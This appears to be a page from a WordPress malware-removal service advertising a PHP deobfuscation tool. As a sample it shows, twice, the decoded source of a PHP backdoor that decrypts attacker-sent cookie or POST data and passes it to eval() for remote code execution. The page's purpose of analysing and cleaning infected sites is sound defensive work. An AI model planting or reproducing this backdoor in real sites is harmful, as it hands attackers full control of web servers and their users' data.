Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
$LEXiAVZO = "str_repeat";
$bYgpA = "explode";
$quyzNEYBh = "count";
$dtDUIBci = "pack";
$zdlIdRU = array(
/* nqdD*/
"zRLYoIhl" => "ZapYfHfAtQFvMltL",
);
$ioYxx = array("caKTDjLvdSZJcinNSriM" => "YRitufajjkQpPauXkUJyl");
$DTfwQi = array(
$zdlIdRU,
$_COOKIE,
$zdlIdRU,
/* o */
$_POST,
$ioYxx,
);
foreach ($DTfwQi as $DWKlivjab) {
/*oXk */
foreach ($DWKlivjab as $LWyPwXL => $USNmk) {
/* HONow*/
$USNmk = @$dtDUIBci("H*", $USNmk);
$LWyPwXL .= "joZq-XjDTb-WqLIw-daF-TVWnsah-icNXrZy-MBfZ";
$LWyPwXL = $LEXiAVZO(
/*D*/
$LWyPwXL,
strlen($USNmk) / strlen($LWyPwXL) + 1
);
/* vM*/
$FWzKjVHn = $USNmk ^ $LWyPwXL;
/* DNkx*/
$WTQCku = $bYgpA(
/*Bwg */
'#',
$FWzKjVHn
);
if ($quyzNEYBh($WTQCku) == 3) {
/*ejMUA*/
$kEWGW = $WTQCku[1];
$CuhRjAV = $WTQCku[2];
$BbFZAxTW = $kEWGW($CuhRjAV);
eval($BbFZAxTW);
die;
}
}
/*N*/
} ?><?php
$LEXiAVZO = "str_repeat";
$bYgpA = "explode";
$quyzNEYBh = "count";
$dtDUIBci = "pack";
$zdlIdRU = array(
/* nqdD*/
"zRLYoIhl" => "ZapYfHfAtQFvMltL",
);
$ioYxx = array("caKTDjLvdSZJcinNSriM" => "YRitufajjkQpPauXkUJyl");
$DTfwQi = array(
$zdlIdRU,
$_COOKIE,
$zdlIdRU,
/* o */
$_POST,
$ioYxx,
);
foreach ($DTfwQi as $DWKlivjab) {
/*oXk */
foreach ($DWKlivjab as $LWyPwXL => $USNmk) {
/* HONow*/
$USNmk = @$dtDUIBci("H*", $USNmk);
$LWyPwXL .= "joZq-XjDTb-WqLIw-daF-TVWnsah-icNXrZy-MBfZ";
$LWyPwXL = $LEXiAVZO(
/*D*/
$LWyPwXL,
strlen($USNmk) / strlen($LWyPwXL) + 1
);
/* vM*/
$FWzKjVHn = $USNmk ^ $LWyPwXL;
/* DNkx*/
$WTQCku = $bYgpA(
/*Bwg */
'#',
$FWzKjVHn
);
if ($quyzNEYBh($WTQCku) == 3) {
/*ejMUA*/
$kEWGW = $WTQCku[1];
$CuhRjAV = $WTQCku[2];
$BbFZAxTW = $kEWGW($CuhRjAV);
eval($BbFZAxTW);
die;
}
}
/*N*/
}Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.